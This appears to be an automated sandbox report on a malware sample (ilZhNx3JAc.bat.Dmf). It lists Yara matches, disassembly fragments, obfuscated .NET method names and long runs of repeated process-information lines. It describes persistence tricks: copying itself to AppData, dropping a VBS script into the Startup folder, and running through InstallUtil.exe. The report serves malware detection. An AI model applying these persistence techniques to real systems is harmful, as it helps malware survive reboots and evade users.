                    Source: Yara matchFile source: 16.2.MustFlush.bat.Dmf.60f8fa0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.MustFlush.bat.Dmf.6006d78.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.5f46858.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.MustFlush.bat.Dmf.5e02330.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1406003010.0000000008AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_0419AAE3 pushad ; retf 7_2_0419AAE7
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_04198BF8 push eax; retf 0007h7_2_04198C02
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_0419702D push 0007CA45h; retf 0007h7_2_04197042
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_04199C30 push es; ret 7_2_04199C40
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08A8679E push esi; iretd 7_2_08A8679F
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B7C4F8 push eax; iretd 7_2_08B7C4F9
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08B704E5 push edi; ret 7_2_08B704E6
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 7_2_08C736DC push es; retf 7_2_08C736E2
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_00C3AAE3 pushad ; retf 16_2_00C3AAE7
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_088104E5 push edi; ret 16_2_088104E6
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_0881C4F8 push eax; iretd 16_2_0881C4F9
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 16_2_089136DC push es; retf 16_2_089136E2
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, rKl4Lg7OEo5Kh9p6gI8.csHigh entropy of concatenated method names: 'C2D7ydMgUu', 'QgJ7ieDv13', 'UgO7DmYuT1', 'nfa7YTWaOF', 'IHt7vbO1Aq', 'dUOqoLYkCbhRuB13SSH', 'm48PHnY56OShfCoU7Mo', 'siDPihYgVHwMfdDCjcH', 'unH5vXYbdwMZ85ZMRr0', 'aDoFlOYNrSm1sIwMr8W'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'X1IvcqcAaFxMnXfMfvL'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, Mrc9xStYQ8VxKoXKbl4.csHigh entropy of concatenated method names: 'IObtp5VBKd', 'KYdtfqxp3K', 't9Ht0RtPa4', 'eVgtWPkXeP', 'R0CtVlya57', 'jqVtlbldSg', 'kOutMq6wkj', 'wjEtS0FshE', 'zCmthpqdpQ', 'LMttoRpmLR'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, saEpX2tOaZ3MHMPHSgw.csHigh entropy of concatenated method names: 'MDJJTBhW8W', 'zt5JBtpwsP', 'f4A4VWw5XXt8HhmGE4E', 'Yo2lpQwgf2EShVDGXKB', 'YAs296wbqpAAuYqRiCS', 'oCF3MNwN0PPCTdabJs3', 'IXNiOMw9GfaMc5mY14T', 'lfXVEAwRYe6eKrLfl4U'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, M3kbOgtzHH2l7rsni2f.csHigh entropy of concatenated method names: 'HNKgdMuM2i', 'mjTgaD0UIg', 'UEOgUf23rb', 'BTFg4k3mry', 'Hypge6dCta', 'P0MgGsgUiY', 'LXcg8lxV29', 'mHQTXl00eZ', 'fuUgCxguvm', 'mZqgOPYuPb'
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, I7DiZmuDr9s6wMO6NpB.csHigh entropy of concatenated method names: 'QByRv8cKHybJKbYIcKT', 'NNjHOBc2SvDleEeJFNx', 'IoUtt0pkv3', 'NWXewecEkIJ5duAOnsd', 'qmqv5acpuwkSX6h2RxH', 'oQPauncfRUrd9kVXj7I', 'BW8YS7c0pjTX9j9xQlC', 'iCYIL5cWvIANrSWtCBe', 'mpkIPpcVravSA8TGh4A', 'ErchFocl7IK0jlTj2AQ'

                    Persistence and Installation Behavior

                    barindex
                    Uses cmd line tools excessively to alter registry or file data
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfJump to dropped file
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfJump to dropped file
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfJump to dropped file
                    Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbsJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbsJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess information set: NOOPENFILEERRORBOXJump to behavior
